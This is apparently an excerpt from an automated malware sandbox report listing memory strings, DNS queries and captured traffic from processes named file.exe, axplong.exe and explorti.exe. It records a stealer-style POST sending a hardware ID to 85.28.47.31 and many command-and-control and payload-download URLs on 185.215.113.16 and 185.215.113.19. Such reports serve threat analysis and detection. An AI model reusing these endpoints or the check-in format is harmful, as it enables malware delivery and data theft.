data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div 
class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3100479236.00000270E230D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 00000017.00000002.3287159999.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account3"L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountV,' equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountbrowser.newtabpage.enabled equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 0000001B.00000002.3286301463.000000000211A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounte' equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 0000001B.00000002.3336626547.0000000006678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounti" equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountvalidate/chromeModifiers< equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC74B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comvar(--link-color-hover) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: moz-nullprincipal:{4f72cf2b-9aab-4bee-930a-ee40cebce880}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3263744904.00000277E8E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: phttps://www.youtube.com/account --attempting-deelevation) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: previousHandler.preferredAction.https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3077234042.00000270DC5B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 00000017.00000002.3336856611.0000000006699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: vs://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bdb44f72d9.exe, 00000017.00000002.3336856611.0000000006699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: vs://www.youtube.com/accountz equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB05D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC9A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3046958834.00000270D881B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/accountZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com~ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3060815323.00000270DADB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3106563989.00000270E4116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3106563989.00000270E4116000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3077234042.00000270DC5B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 41 41 32 45 43 42 43 45 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 2d 2d 0d 0a Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="hwid"25AA2ECBCE684217651120------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="build"sila------EHDGIJJDGCBKFIDHIEBK--
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3073075739.00000270DB8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3112345022.00000270E5C85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3111886581.00000270E5C59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3112345022.00000270E5C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3111886581.00000270E5C70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052950108.00000270DA46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2289000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2?
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpH
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpR?-
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb?
Source: axplong.exe, 00000012.00000002.3256607765.000000000122F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpn
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpn?
Source: axplong.exe, 00000012.00000002.3256607765.000000000122F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000012.00000002.3256607765.000000000122F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded5
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpv?
Source: axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
Source: axplong.exe, 00000012.00000002.3256607765.000000000122F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2396165975.0000000028D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2396165975.0000000028D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe16/soka/random.exeN
Source: file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.execZT
Source: explorti.exe, 00000013.00000002.3258303084.00000000015F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000013.00000002.3258303084.00000000015F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe13
Source: explorti.exe, 00000013.00000002.3258303084.00000000015F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exeG
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exexd_
Source: axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ws
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/15.113.19/
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/B
Source: explorti.exe, 00000013.00000002.3258303084.000000000159B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3258303084.00000000015F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php17001
Source: explorti.exe, 00000013.00000002.3258303084.00000000015F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000013.00000002.3258303084.0000000001648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpL
Source: explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpSeD
Source: explorti.exe, 00000013.00000002.3258303084.0000000001648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpU)(A;OICI;FA;;;SY)l
